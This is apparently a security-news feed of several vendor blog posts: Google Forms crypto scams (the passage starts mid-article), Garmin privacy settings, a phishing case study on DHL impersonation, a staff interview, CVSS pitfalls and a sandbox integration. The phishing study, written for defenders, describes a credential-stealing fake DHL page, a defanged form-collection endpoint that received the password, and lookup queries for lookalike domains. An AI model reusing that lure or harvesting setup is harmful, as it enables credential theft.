The scammers are counting on victims finding an offer of 1.275 BTC too hard to resist

The scammers are counting on victims finding an offer of 1.275 BTC too hard to resist

If we take a closer look at these emails, we’ll see that they don’t exactly win any awards for looking legit. That’s because, while Google Forms is a free tool that allows anyone, including scammers, to create professional-looking emails, these emails have a very specific look that’s pretty hard to pass off as a real crypto platform notification. So why do scammers use Google Forms?

Because this allows the message to slip through email filters, and there’s a good reason for that. Email messages like these are sent from Google’s own mail servers and include links to the domain forms.gle. The links look legit to spam filters, so there’s a good chance these messages will make it into your inbox. This is how scammers exploit the good reputation of this online service.

Google Forms scams are on the rise. According to some experts, the number of these scams increased by 63% in 2024 and likely continues to grow in 2025. That means one thing: you need to share this post right now with your loved ones who are just starting to explore the internet. Tell them about the most common types of scams today and how to protect themselves.

Protecting yourself from Google Forms scams

The easiest and most effective approach is to rely on a trusted security tool that alerts you whenever you try to visit a phishing website. What are some other things you can do?

  • Avoid following links in emails you weren’t expecting. Chances are, there’s nothing good behind them.
  • Avoid entering your personal information on suspicious websites. If your curiosity gets the better of you and you do click a link in an email, be absolutely sure not to enter any payment or personal information.
  • Remember the free lunch. Alert: there is no such thing. Watch out for offers promising payments or prizes — especially if they ask you to pay a commission upfront.
  • Learn how other types of scams operate and share the news of the latest threats with your loved ones.

If you’ve grown tired of all the Google Forms scams, you can set up a filter for the phrase “Create your own Google Form” in your email client. Every single Google Forms email contains that phrase, so the filter will move any messages with the text right to the spam folder. The problem with this approach is that you might miss legitimate emails from Google Forms. Here’s how to block these emails in Gmail and Outlook.

Read about other tricks that scammers have up their sleeves:

Kaspersky official blog – ​Read More

How to set up security and privacy in Garmin apps | Kaspersky official blog

Sports smartwatches continue to be a prime target for cybercriminals, offering a wealth of sensitive information about potential victims. We’ve previously discussed how fitness tracking apps collect and share user data: most of them publicly display your workout logs, including precise geolocation, by default.

It turns out that smartwatches continue that lax approach to protecting their owners’ personal data. In late June 2025, all COROS smartwatches were found to have serious vulnerabilities that exposed not only the watches themselves but also user accounts. By exploiting them, malicious actors can gain full access to the data in the victim’s account, intercept sensitive information like notifications, change or factory-reset device settings, and even interrupt workout tracking leading to the loss of all data.

What’s particularly frustrating is that COROS was notified of these issues back in March 2025, yet fixes aren’t expected until the end of the year.

Similar vulnerabilities were discovered in 2022 in devices from arguably one of the most popular manufacturers of sports smartwatches and fitness gadgets, Garmin, although these issues were promptly patched.

In light of these kinds of threats, it’s natural to want to maximize your privacy by properly configuring the security settings in your sports apps. Today, we’ll break down how to protect your data within Garmin Connect and the Connect IQ Store — two online services in one of the most widely used sports gadget ecosystems.

How to find privacy settings in Garmin Connect

The privacy settings are located in different sections of the menu depending on whether you’re using the mobile app or the web version.

In the Garmin Connect mobile app:

  1. Open Garmin Connect on your smartphone.
  2. Tap the three dots (More section) in the bottom right corner.
  3. Select Settings.
  4. Locate Profile & Privacy.
How to find the privacy settings in Garmin Connect for iOS — the process is essentially the same in the Android version of the app

How to find the privacy settings in Garmin Connect for iOS — the process is essentially the same in the Android version of the app

In the web version of Garmin Connect:

  1. Open the Garmin Connect website in a browser.
  2. Click the profile icon in the top right corner.
  3. Select Account Settings.
  4. Navigate to Privacy Settings.
How to find the privacy settings in the web version of Garmin Connect

How to find the privacy settings in the web version of Garmin Connect

There, you can adjust the visibility of your profile, activities, and steps, and even decide who can see your badges. For the highest level of privacy, we recommend selecting Only me. This ensures that your personal information, workout stats, and other data are visible only to you.

How to hide your workout locations in Garmin Connect

Revealing your routes is one of the most significant privacy risks. This could allow malicious actors to track you in near real-time.

Analysis of publicly available geodata has repeatedly revealed leaks of highly confidential information — from the locations of secret U.S. military bases exposed by anonymized heatmaps of service members’ activity, to the routes of head-of-state motorcades, pieced together from their bodyguards’ smartwatch tracking data. All this data ended up publicly accessible, not because of a hack, but due to incorrect privacy settings within the app itself, which broadcasts all of the owner’s movements online by default.

These leaks clearly showed that data from wearable sensors can cause a lot of problems for their wearers. Even if you’re not guarding top government officials, training maps can reveal your home address, workplace, and other frequently visited locations.

Garmin’s tactical watch models include a Stealth mode feature, designed specifically for military personnel. In their line of work, a lack of privacy can be a matter of life and death. However, with Garmin Connect, you can set up your own privacy zones for almost every Garmin gadget.

Setting up privacy zones:

  1. Open your Garmin Connect profile in a browser (the feature isn’t available in the mobile app).
  2. Navigate to Privacy Zones.
  3. Tap + Add New Zone.
  4. Enter your home address or some other place you want to hide.
  5. Set a zone radius — we recommend at least 500 meters.
How to set up privacy zones in Garmin Connect

How to set up privacy zones in Garmin Connect

Garmin’s Privacy Zones are quite similar to a feature Strava introduced back in 2013. They automatically hide the start and end points of your workouts if these fall within a designated area. And even if you share your workout with the whole world, it’ll be impossible to see your exact location — for example, your home.

Just a bit further up in that same section, it’s worth checking out other ways your movement data might be used: for instance, to create heatmaps based on user routes. You can opt out of sharing this kind of data. To understand what each function does and how to adjust it, simply tap Edit directly below it. A description will pop up, explaining what data is collected and how it’s used.

How to adjust advanced data collection and sharing settings in Garmin Connect

How to adjust advanced data collection and sharing settings in Garmin Connect

How to change the visibility of past activities in Garmin Connect

Changing your privacy settings won’t retroactively apply to activities you’ve already saved in Garmin Connect. Even if you crank up your privacy to the max right now, all your past recordings will still show up with the visibility settings they had when you first created them. So if you’ve been using Garmin for a while and you’re just now getting around to tweaking your privacy, you’ll want to update your previously saved activities as well.

  1. Sign in to the web version of Garmin Connect.
  2. Select Account Settings → Privacy Settings.
  3. Locate Update Past Activities, select a new level of privacy for all past workouts, and confirm your changes.
You can only change the privacy settings for your previously saved activities in the web version of Garmin Connect.

You can only change the privacy settings for your previously saved activities in the web version of Garmin Connect.

How to delete individual activities in Garmin Connect

You can remove specific saved activities so no one can see them.

  1. Open the Garmin Connect mobile app.
  2. Navigate to More → Activities → All Activities.
  3. Select the workout you want to delete.
  4. Tap the three dots in the top right corner.
  5. Tap Delete Activity.
How to remove individual workout records from Garmin Connect

How to remove individual workout records from Garmin Connect

If you need to wipe all your previously saved activities, and you have a lot of them, it might be easier to delete your old account and create a new one. However, keep in mind that deleting your account will result in the loss of all your workout data and health metrics.

How to monitor connected devices and services in Garmin Connect

Another potential source of personal data leaks comes from devices and services that have access to your Garmin Connect account. If you frequently switch out your sports gadgets, make sure you remove them from your account.

  1. Tap the device icon in the top right corner of Garmin Connect.
  2. The Devices section will open.
  3. Remove any unfamiliar or unused devices by swiping left on them.

Next, check the list of third-party apps that have access to your account:

  1. Open Settings.
  2. Navigate to Connected Apps, and remove those you no longer use.
How to remove old devices and connected apps from Garmin Connect

How to remove old devices and connected apps from Garmin Connect

How to protect yourself from vulnerabilities in Connect IQ

It’s not just incorrect privacy settings in Garmin Connect that can expose your data. Vulnerabilities in apps and watch faces available through the Connect IQ Store marketplace can also lead to data leaks. In 2022, security researcher Tao Sauvage found that the Connect IQ API developer platform contained 13 vulnerabilities. These could potentially be exploited to bypass permissions and compromise your watch.

Some of these vulnerabilities have been lurking in the Connect IQ API since its very first release back in 2015. Over a hundred models of Garmin devices were at risk, including fitness watches, outdoor navigators, and cycling computers. Fortunately, these vulnerabilities were patched in 2023, but if you haven’t updated your device since before then (or you purchased a used gadget), it’s crucial to update its firmware to the latest version.

Even though these specific vulnerabilities have been fixed, the Connect IQ Store remains a potential entry point for future threats. Because of this, we recommend the following:

  1. Avoid installing third-party watch faces and apps from unknown developers in the Connect IQ Store.
  2. Stick to official Garmin watch faces built into your device.
  3. Make sure to regularly update your Garmin devices. You can do this through Garmin Express on your desktop, or by using Garmin Connect on your smartphone.
  4. Turn off automatic app downloads from the Connect IQ Store in the settings.

General recommendations

In an era of increasing cyberthreats to IoT devices, properly configuring the privacy settings on your wearables is crucial. Your digital security doesn’t just depend on device vendors; it also relies on the steps you take to protect your personal data.

  1. Use unique passwords for all accounts, including Garmin Connect. Read more on how to create a strong and easy-to-remember password.
  2. Turn on two-factor authentication wherever possible.
  3. Double-check the privacy settings after every app update to avoid any unwelcome surprises.
  4. Curb your connections on the Garmin Connect social network.
  5. Ignore connection requests from strangers.

To manage privacy for popular apps and gadgets, be sure to use our free service, Privacy Checker. And to stay on top of the latest cyberthreats and respond quickly, subscribe to our Telegram channel. Finally, the specialized privacy protection modes in Kaspersky Premium ensure maximum security for your personal information and help prevent data theft across all your devices.

Below are detailed instructions on how to configure security and privacy for the most popular running trackers.

Kaspersky official blog – ​Read More

Beating Supply Chain Attacks: DHL Impersonation Case Study  

ANY.RUN’s services processes data on current threats daily, including attacks affecting supply chains. In this case study, we analyze examples of DHL brand abuse. The company is a leading global logistic operator, and attackers exploit its recognition to send phishing emails, potentially targeting its partners.  

We will demonstrate how ANY.RUN’s solutions can be used to identify such threats, collect technical indicators, and enhance security. Here are the key findings. 

Key Takeaways 

  • Supply chain attacks are on the rise: adversaries actively exploit third-party relationships. 
  • Real-world example: attackers impersonated DHL in phishing emails targeting partner organizations, like Meralco, using fake domains and deceptive attachments to collect credentials. 
  • HTML attachment bypasses filters: lesser-known file extensions are used. 
  • Credential theft via third-party form service: analysis with HTTPS MITM revealed a POST request containing plaintext credentials sent to a unique endpoint. 
  • Shared visual lures identified by image hash: the DHL-themed image in the phishing email was reverse-searched via its SHA256 hash, revealing five other phishing campaigns using the same lure. 
  • DHL-imitating domains and filenames as indicators: analysts identified 39 phishing domains (e.g., dhlshipment*, -dhl.) and over 300 malware samples with DHL-themed filenames (e.g., dhlreceipt*.pdf) — exposing common obfuscation patterns and phishing themes used to trick users. 

Supply Chain Attack Growing Dynamics 

A supply chain attack is a type of cyberattack where adversaries gain access to a target organization by compromising a less protected external participant in the interaction chain: a contractor, a supplier, a technology partner, or another link. 

The data from Cyble reveals supply chain attacks steady growth. From October 2024 to May 2025, an average of more than 16 incidents per month has been recorded, a 25% increase from the previous eight-month period. A sharp spike in activity was observed in April and May 2025. This dynamic indicates growing attacker interest in this attack model and its increasingly widespread use in real campaigns. 

Real-world examples include the Scattered Spider group’s attack on Australian airline Qantas. The attackers penetrated through a third party (contact center), which is typical for such attacks.

DHL Brand Abuse in Phishing Campaigns 

Suppose we are information security specialists at a company that collaborates with DHL and could be used by attackers as an intermediate link in the attack chain. 

Our task is to detect timely phishing emails disguised as official correspondence from DHL. Such messages may target company employees, contractors, or other DHL partners. 

To identify such activity, we use ANY.RUN’s YARA Search — we’ll create a rule that allows us to find .eml files mentioning DHL in the From, To, and Subject headers. This will help collect indicators, identify malicious attachments, and assess potential risks to our infrastructure. 

YARA rule search in Threat Intelligence Lookup 

The search delivered over 110 files and associated analysis sessions (tasks) from the ANY.RUN’s Interactive Sandbox. This data allows us to: 

  • Identify malicious campaigns that exploit the DHL brand, including cases of possible compromise of official email accounts and infrastructure of the company or its contractors. 
  • Identify applied tactics, techniques, and procedures (TTPs).  
  • Classify the malware involved.

Not all found objects contain malicious payloads, but many are interesting from an analytical perspective, as examples of malicious brand abuse. 

How to Detect DHL-themed Phishing in Your Infrastructure 

To effectively detect and analyze DHL-themed phishing attempts within your infrastructure, consider the following practices: 

Scan Your Endpoints with YARA Rule 

Utilize a YARA rule to scan your email endpoints for any emails related to DHL. Here’s an example of a YARA rule you can use: 

This rule helps identify emails that mention DHL in the subject line, sender, or recipient fields. 

Analyze Suspicious Emails, Files, and URLs in ANY.RUN’s Interactive Sandbox 

ANY.RUN’s Interactive Sandbox allows you to safely open and interact with suspicious files and URLs.  

You can safely open emails and click through any attachments or links within a controlled environment. This helps in understanding the full attack chain from the initial phishing email to the execution of any malicious payloads. 

Use TI Lookup to Gather Context on Alerts 

Leverage ANY.RUN’s Threat Intelligence Lookup to quickly verify whether an artifact (URLs, file hashes, or even command line activities) involved in an alert within your company is associated with a specific attack.  

Gather context on the alerts by identifying related campaigns and understanding the broader context of the attacks. This helps in recognizing common tactics, techniques, and procedures (TTPs) used by attackers, allowing for faster and more accurate responses to potential threats. 

Case Study: Analyzing a Phishing Email targeting DHL counterparties 

We shall analyze in ANY.RUN’s Sandbox one of the emails found by YARA scanning.  

View sandbox analysis 

Pseudo-DHL email with a phishing attachment 

The email sender masquerades as DHL Express International. The “From” field displays the corresponding display name, but the actual sender address Haalasolamagic@cirrcor[.]com belongs to a third-party organization not affiliated with DHL. 

The email is directed to an address in the meralco[.]com[.]ph domain, belonging to Meralco, the largest energy company in the Philippines. Previously, DHL objects were mentioned in Meralco’s planned power outage notifications, and in May 2025, Meralco’s subsidiary MSpectrum announced a joint project with DHL Supply Chain Philippines. 

Based on this, we can assume that the cooperation between DHL and Meralco does exist, and the attackers’ use of such an addressee may not be coincidental. 

The email looks like a part of an attempt at a supply chain attack. The email is not directed to DHL, but to an organization affiliated with it. The use of corporate identity and business context may be part of a scenario where attackers try to gain access to the main target through its partners or contractors — a typical technique in targeted campaigns. 

IMPORTANT: Please report all instances of DHL impersonation to the company’s official Anti-Abuse Mailbox.

Email Content Analysis 

The email body uses DHL’s corporate identity and phrasing typical for business correspondence. The recipient is asked to open an attachment — a file named “Draft BL & Shipping Invoice.shtm,” allegedly containing a preliminary invoice and waybill for confirmation. The .shtm (a variant of .html) extension is likely used for masking and bypassing email filters. 

When the attached file is opened in a browser, a DHL-styled web page is displayed with a password submission form. The user is asked to authenticate to view an allegedly encrypted document supposedly sent from DHL. This is typical for phishing pages imitating official delivery services and used to collect credentials. 

Web page with fake credential-stealing authentication form 

Network Activity Analysis 

The network activity generated while interacting with this form contains a request to submit-form[.]com.  

submit-form.com in the Connections section of the Sandbox analysis 

This service is used to collect data entered in HTML forms and allows redirecting it directly to a specified email address. 

If we try to analyze the network request sent when entering data into the form, we’ll only see a connection through port 443. The connection is encrypted, and its content, including the entered password, is not available for viewing without applying MITM methods. 

MITM Analysis

To get more information, we restart the analysis of this email in ANY.RUN’s Sandbox with the HTTPS-MITM-PROXY (MITM) function enabled to get access to the network packet contents.  

Click Restart in a sandbox session to run the analysis with different parameters 

View analysis  

In the new analysis with MITM enabled, we open the attached .shtm file and enter a password in the form, for example “password999,” then click “View Document”. 

Going to the HTTP Requests tab, we find a POST request sent to https://submit-form[.]com/7zFSu099A.  

submit-form.com request in the HTTP Requests section of the Sandbox analysis 

The request contents confirm the transfer of entered data: the request body contains form field values, including the entered password. This proves that the attacker uses the third-party service submit-form[.]com to collect authentication data entered by the victim on the phishing page. 

Request forwarding user’s password 

Submit-form dot com Usage Analysis 

Using ANY.RUN Threat Intelligence Lookup to check the submit-form[.]com domain and related campaigns, we find more than 200 public analyses featuring the website. Most are marked as malicious: attackers actively use submit-form[.]com to intercept data entered on phishing pages, including passwords and email addresses. 

domainName:”submit-form.com” 

Sandbox analyses featuring the website for exfiltrated user data 

Now we can estimate the relevance and scale of such threats and make decisions about blocking/monitoring of this domain. 

Image-Based Search for Similar Attacks 

To find additional indicators of similar attacks, we have analyzed the image imitating DHL design used in the email above. Using this image, we can find other phishing campaigns using the same file, thus expanding our set of indicators and understanding of brand abuse scale. 

Image from the phishing email searchable by hash in TI Lookup 

We extract the image’s SHA256 hash from the static analysis and perform a search for the image through ANY.RUN’s TI Lookup.   

The image’s hash in the file analysis 

The search returns 5 analyses featuring identical images. They were used in campaigns targeting various addresses that may belong to potential contractors, clients, or company employees. 

Hash search results: sandbox analyses of similar attacks 

These analyses allow us to study additional social engineering techniques and various phishing strategies and to collect threat indicators: email subjects, sender IP addresses, malicious domains.  

Identifying Malicious Domains Imitating DHL 

Now we search for domains that imitate official DHL resources to understand what phishing domains might be used to masquerade as partner organizations. This helps us understand: 

  • What tactics and methods attackers use. 
  • How such resources are designed (appearance, structure, content copying).
  • What payload they may distribute. 

A simple query in ANY.RUN’s TI Lookup allows us to find phishing domains imitating DHL, focusing on typical patterns used in the logistics industry, including campaigns masquerading as delivery notifications, documents, or cargo movements. 

domainName:”dhl.” or domainName:”dhlshipment*” OR domainName:”dhldocument*” 

Domains imitating DHL notifications in malware samples 

The query results provide access to 39 public analyses containing the specified patterns. This data can be used to enrich IOC collection and improve phishing detection and filtering by security systems.  

Analyzing Files Imitating Legitimate DHL Attachments 

Additionally, we can search for the names of files uploaded to ANY.RUN that contain mentions of the partner company. This analysis helps to: 

  • Identify popular malware distribution schemes abusing DHL. 
  • Determine which malware families are employed. 
  • Collect related indicators — file names, hashes, attachments. 
  • Obtain data on vulnerabilities used by attackers. 

Here is a TI Lookup query exposing files imitating legitimate DHL attachments:  
 
filePath:”dhlreceipt*” or filePath:”dhlshipment*” or filePath:”dhldelivery*” 

Malware samples containing files with DHL-related names 

We have found over 300 analyses containing the requested patterns in file names. Not all of them are malicious, but a significant portion is worth analyzing for updating filters, detection rules, and raising awareness about DHL masquerading techniques in recent attacks.

Conclusion 

In this case study, we demonstrated how ANY.RUN’s Interactive Sandbox and Threat Intelligence Lookup can be used to identify threats related to potential supply chain attacks. Using DHL as an example, we analyzed activity targeting its partners and contractors — from phishing emails to impersonating domains. 

Such activity may be part of preparation for supply chain attacks. The presented methods allow timely identification of such risks and adaptation of approaches to the specifics of a particular organization. 

About ANY.RUN

Over 500,000 cybersecurity professionals and 15,000+ companies in finance, manufacturing, healthcare, and other sectors rely on ANY.RUN. Our services streamline malware and phishing investigations for organizations worldwide.    

  • Speed up triage and response: Detonate suspicious files using ANY.RUN’s Interactive Sandbox to observe malicious behavior in real time and collect insights for faster and more confident security decisions. 
  • Improve threat detection: ANY.RUN’s Threat Intelligence Lookup and TI Feeds provide actionable insights into cyber attacks, improving detection and deepening understanding of evolving threats.  

 Request a trial of ANY.RUN’s services to see how they can boost your SOC workflows. 

The post Beating Supply Chain Attacks: DHL Impersonation Case Study   appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Meet Hazel Burton

Meet Hazel Burton

Welcome to the first episode of Humans of Talos, a new video interview series that shines a spotlight on team members across Talos. Featuring their personal stories, career journeys and unique perspectives, you’ll get an inside look into what it’s like to work in our organization and the people who make the internet more secure for all.

Amy Ciminnisi: Hello and welcome to the first episode of Humans of Talos! I’m here with Hazel Burton, who should be a familiar face to most of you. I’m curious: What led you to your role at Talos? What made you want to join?

Hazel Burton: I’d always worked in small businesses before and always had a bit of an entrepreneurial mindset because of that. I just started doing things that I wasn’t supposed to be doing! I commandeered an office in one of the small businesses, turned it into a TV studio and started creating security content. That somehow led me on a path to joining Cisco.

I was doing a lot of storytelling and communications around some of the main challenges that people in this industry go through, but I was always finding excuses to work with Talos. I love the people at Talos, but I also love the ethos: doing the right thing, even if it makes no commercial sense whatsoever. So when I was asked to hop over the fence and work full-time at Talos leading content programs and and data-driven stuff, it was an opportunity to help a really strong organization rooted in that ethos to do what they do best and make things easier for people in this industry. So it was a pretty easy decision to make to join Talos.

AC: Following that, what advice you would give to someone who would want to join Talos?

HB: Ask bold questions would be my first piece of advice. This is a very safe space to be able to do things like that. Ask, “Could this work? What if we tried this?” I promise you, you will be hired based on you asking those questions and you will be trusted to find the answers, even if the answer is, “Yeah, that didn’t work at all, did it? Oh, well.”

The other one — I don’t know if I can say this, you might want to bleep it out — but don’t be an arsehole. The people that we work with are as generous as they are amazingly smart and talented. So sharing their knowledge, helping each other out, not mocking someone for not knowing something, saying, “I don’t have any experience in this, can you help me?” That is what Talos is about. If you are only looking after number one, then probably don’t join Talos. But if you do want to be part of something where everyone has your back, then do.

The third thing that I think is really important for people to know, because they might have been burned by this before, is that we do actually have a leadership team who fights to give Talos people the air cover that they need when they need to go out and do things. So, it happens quite often where we’ll have to drop something and go to a rapid response effort — because, you know, the world — and we’re given the resources to be able to do that and the air cover. So if you don’t have that at the moment, trust me: When you find it, it’s the most amazing thing in the world because you know that you are going to have a clear runway. That is the nature of how the organization works.

AC: Yeah. It doesn’t just help the person grow their own skillset, it doesn’t just help Talos — but having that airway helps everyone as a whole, the cybersecurity community and beyond.

HB: Also, bring your own nerdy self to work! Again, it’s a very safe place to do that.

For more, watch the full interview.

Cisco Talos Blog – ​Read More

Why is your data worth so much? | Unlocked 403 cybersecurity podcast (S2E4)

Behind every free online service, there’s a price being paid. Learn why your digital footprint is so valuable, and why you might be the product.

WeLiveSecurity – ​Read More

Common mistakes in using CVSS | Kaspersky official blog

When you first encounter CVSS (Common Vulnerability Scoring System), it’s easy to think this is the perfect tool for triaging and prioritizing vulnerabilities. A higher score must mean a more critical vulnerability, right? In reality, that approach doesn’t quite work out. Every year, we see an increasing number of vulnerabilities with high CVSS scores. Security teams just can’t patch them all in time, but the vast majority of these flaws are never actually exploited in real-world attacks. Meanwhile, attackers are constantly leveraging less flashy vulnerabilities with lower scores. There are other hidden pitfalls too — ranging from purely technical issues like conflicting CVSS scores to conceptual ones like a lack of business context.

These aren’t necessarily shortcomings of the CVSS itself. Instead, this highlights the need to use the tool correctly, as part of a more sophisticated and comprehensive vulnerability management process.

CVSS discrepancies

Do you ever notice how the same vulnerability might have different severity scores depending on the available source? One score from the cybersecurity researcher who found it, another from the vendor of the vulnerable software, and yet another from a national vulnerability database? It’s not always just a simple mistake. Sometimes, different experts can disagree on the context of exploitation. They might have different ideas about the privileges with which a vulnerable application runs, or whether it’s internet-facing. For instance, a vendor might base its assessment on its recommended best practices, while a security researcher might consider how applications are typically configured in real-world organizations. One researcher might rate the exploit complexity as high, while another deems it low. This isn’t an uncommon occurrence. A 2023 study by Vulncheck found that 20% of vulnerabilities in the National Vulnerability Database (NVD) had two CVSS3 scores from different sources, and 56% of those paired scores were in conflict with each other.

Common mistakes when using CVSS

For over a decade, FIRST has advocated for the methodologically correct application of CVSS. Yet organizations that use CVSS ratings in their vulnerability management processes continue to make typical mistakes:

  1. Using the CVSS base score as the primary risk indicator. CVSS measures the severity of a vulnerability — not when it will be exploited or the potential impact of its exploitation on the organization under attack. Sometimes, a critical vulnerability is harmless within a specific company’s environment because it resides in insignificant and isolated systems. Conversely, a large-scale ransomware attack might begin with a seemingly innocuous information leak vulnerability with a CVSS score of 6.
  2. Using the CVSS Base score without Threat/Temporal and Environmental adjustments. The availability of patches, public exploits, and compensatory measures significantly influences how and how urgently a vulnerability should be addressed.
  3. Focusing only on vulnerabilities above a certain score. This approach is sometimes mandated by government or industry regulators (“remediate vulnerabilities with CVSS score above 8 within one month”). As a result, cybersecurity teams face a continuously growing workload that, in reality, doesn’t make their infrastructure more secure. The number of vulnerabilities with high CVSS scores identified annually has been rapidly increasing over the past 10 years.
  4. Using CVSS to assess the likelihood of exploitation. These metrics are poorly correlated: only 17% of critical vulnerabilities are ever exploited in attacks.
  5. Using only the CVSS rating. The standardized vector string was introduced in CVSS so that defenders could understand the details of a vulnerability and independently calculate its importance within their own organization. CVSS 4.0 was specifically revised to make it easier to account for business context using additional metrics. Any vulnerability management efforts based solely on a numerical rating will largely be ineffective.
  6. Ignoring additional sources of information. Relying on a single vulnerability database and analyzing only CVSS is insufficient. The absence of data on patches, working proofs of concept, and real-world exploitation cases makes it difficult to decide how to address vulnerabilities.

What CVSS doesn’t tell you about a vulnerability

CVSS is the industry standard for describing a vulnerability’s severity, the conditions under which it can be exploited, and its potential impact on a vulnerable system. However, beyond this description (and the CVSS Base score), there’s a lot it doesn’t cover:

  • Who found the vulnerability? Was it the vendor, an ethical researcher who reported the flaw and waited for a patch, or was it a malicious actor?
  • Is there an exploit publicly available? In other words, is there readily available code to exploit the vulnerability?
  • How practical is it to exploit in real-world scenarios?
  • Is there a patch? Does it cover all vulnerable software versions, and what are the potential side effects of applying it?
  • Should the organization address the vulnerability? Or does it affect a cloud service (SaaS) where the provider will automatically fix the defects?
  • Are there signs of exploitation in the wild?
  • If there are none, what’s the likelihood attackers will leverage this vulnerability in the future?
  • Which specific systems within your organization are vulnerable?
  • Is the exploitation practically accessible to an attacker? For example, a system might be a corporate web server accessible to anyone online, or it could be a vulnerable printer physically connected to a single computer that has no network access. A more complex example might be a vulnerability in a software component’s method, where the specific business application using that component never actually calls the method.
  • What would happen if the vulnerable systems were compromised?
  • What’s the financial cost of such an event to the business?

All these factors significantly influence the decision of when and how to remediate a vulnerability — or even if remediation is necessary at all.

How to amend CVSS? RBVM has the answer!

Many factors that are often hard to account for within the confines of CVSS are central to a popular approach known as risk-based vulnerability management (RBVM).

RBVM is a holistic, cyclical process, with several key phases that repeat regularly:

  • Inventorying all IT assets of your business. This includes everything from computers, servers and software, to cloud services and IoT devices.
  • Prioritizing assets by importance: identifying your crown jewels.
  • Scanning assets for known vulnerabilities.
  • Enriching the vulnerability data. This includes refining CVSS-B and CVSS-BT ratings, incorporating threat intelligence, and assessing the likelihood of exploitation. Two popular tools for gauging exploitability are EPSS (another FIRST rating that provides a percentage probability of real-world exploitation for most vulnerabilities), and consulting databases like CISA KEV, which contains information about vulnerabilities actively exploited by attackers.
  • Defining the business context: understanding the potential impact of an exploit on vulnerable systems, considering their configurations and how they’re used within your organization.
  • Determining how the vulnerability can be neutralized through either patches or compensatory measures.
  • The most exciting part: assessing the business risk and setting priorities based on all the gathered data. Vulnerabilities with the highest probability of exploitation and possible significant impact on your key IT assets are prioritized. To rank vulnerabilities, you can either calculate CVSS-BTE — incorporating all collected data into the Environmental component, or use alternative ranking methodologies. Regulatory aspects also influence prioritization.
  • Setting deadlines for each vulnerability’s resolution based on its risk level and operational considerations, such as the most convenient time for updates. If updates or patches aren’t available, or if their implementation introduces new risks and complexities, compensatory measures are adopted instead of direct remediation. Sometimes, the cost of fixing a vulnerability outweighs the risk it poses, and a decision might be made not to remediate it at all. In such cases, the business consciously accepts the risks of the vulnerability being exploited.

In addition to what we’ve discussed, it’s crucial to periodically analyze your company’s vulnerability landscape and IT infrastructure. Following this analysis, you need to introduce cybersecurity measures that prevent entire classes of vulnerabilities from being exploited or significantly boost the overall security of specific IT systems. These measures can include network micro-segmentation, least privilege implementation, and adopting stricter account management policies.

A properly implemented RBVM process drastically reduces the burden on IT and security teams. They spend their time more effectively as their efforts are primarily directed at flaws that pose a genuine threat to the business. To grasp the scale of these efficiency gains and resource savings, consider this FIRST study. Prioritizing vulnerabilities using EPSS alone allows you to focus on just 3% of vulnerabilities while achieving 65% efficiency. In stark contrast, prioritizing by CVSS-B requires addressing a whopping 57% of vulnerabilities with a dismal 4% effectiveness. Here, “efficiency” refers to successful remediation of vulnerabilities that have actually been exploited in the wild.

Kaspersky official blog – ​Read More

Turn Alert Noise into Threat Insights without Leaving QRadar SOAR with ANY.RUN 

IBM QRadar SOAR is a go-to platform for incident response. To make things faster and easier for SOCs to use this powerful tool with ANY.RUN’s services, we built an official app. Now you can seamlessly launch different playbooks directly inside SOAR to streamline threat analysis, speed up investigations, and reduce Mean Time to Respond (MTTR) in your SOC.  

Here’s how your team can benefit from the new integration. 

Streamline Your SOC Workflows 

ANY.RUN app for IBM QRadar SOAR 

The app available on IBM Exchange allows SOC teams to start using ANY.RUN’s services in a more flexible and seamless way to detect threats and resolve incidents faster. The setup takes a few seconds as you only need an API key to connect your ANY.RUN account to QRadar SOAR, eliminating the need for custom development.  

With this integration, you can get IOCs and verdicts from the sandbox and indicator context from TI Lookup to simplify triage and enrich incident data. 

  • Early Threat Detection: Real-time data from sandbox analyses and TI Lookup enable you to identify and respond to new attacks at their earliest stages. 
  • Automation of Routine Tasks: Prebuilt playbooks enable automatic or manual actions, saving time for Tier 1 and Tier 2 analysts. 
  • Reduced Response Times: Cuts incident analysis time by automating enrichment and analysis processes. Results feed directly into SOAR playbooks, enabling rapid isolation, blocking, or escalation based on your workflows. 

Proactive Threat Analysis with Interactive Sandbox 

ANY.RUN playbook library 

ANY.RUN’s Interactive Sandbox is a cloud-based service for analysis of suspicious files and URLs. It provides SOC teams with instant access to fully interactive Windows, Linux, and Android virtual machines, allowing you to engage with the system and the sample at hand and detonate every stage of the attack, from opening an email attachment to solving a CAPTCHA. 

The sandbox logs and marks malicious network traffic, processes, registry and file modifications, providing instant visibility into the threat’s behavior. For each analysis, it generates a comprehensive report with a threat level verdict, IOCs, and TTPs.  

With IBM QRadar SOAR integration, your SOC team can use the Automated Interactivity of the Sandbox to:  

  • Triage Files and URLs: Send suspicious files or URLs from IBM QRadar SOAR to ANY.RUN’s Sandbox for instant analysis, reducing manual effort. 
  • Gain Deep Behavioral Insights: Access detailed logs of malicious activities, including network traffic, processes, and file changes, for thorough threat understanding. 
  • Auto-Detonate Multi-Stage Attacks: Take advantage of Automated Interactivity for automated execution of user actions such as archive extraction, CAPTCHA solution, and payload launching to reach the final stage of the attack and ensure complete detection. 

For the most accurate results, it’s recommended to avoid manual interference during the sandbox session. Let the analysis run to completion, so all behavior stages can be observed and properly logged. 

Integrate ANY.RUN’s Interactive Sandbox in your SOC
Automate threat analysis, cut MTTD, & boost detection rate 



Contact us


Instant Incident Enrichment with TI Lookup 

ANY.RUN TI Lookup playbook 

Threat Intelligence Lookup contains a database of fresh Indicators of Compromise (IOCs), Behavior (IOBs), and Action (IOAs) extracted from live sandbox analyses of active malware and phishing attacks across 15,000 organizations.  

It lets you search across various types of indicators, from IPs and domains to mutexes and registry keys. Since all data comes from real-time detonation of threats, TI Lookup always offers fresh indicators, available within hours and even minutes after the attack happened.  

With IBM QRadar SOAR integration, your SOC team can use TI Lookup to:  

  • Enrich Incidents Automatically: Pull detailed threat intelligence for key indicator types, including DNS Name, File Name, File Path, IP Address, MD5, SHA-1, SHA-256, Mutex, Port, Process Name, Registry Key, and URL, directly into SOAR incidents. 
  • Add Behavioral Threat Context: Enhance indicators with behavioral insights from live sandbox analyses, providing deeper context for threat understanding. 
  • Speed Up Threat Assessment: Use fresh, high-quality data from 15,000 organizations to quickly evaluate and prioritize potential threats. 

Get instant threat context with TI Lookup
Act faster. Slash MTTR. Stop breaches early 



Contact us


What Your Team Gains: Business and Operational Benefits 

The IBM QRadar SOAR integration with ANY.RUN delivers measurable performance gains across your SOC, improving key metrics like Mean Time to Detect (MTTD) and Mean Time to Respond (MTTR), while enhancing decision-making at every level. 

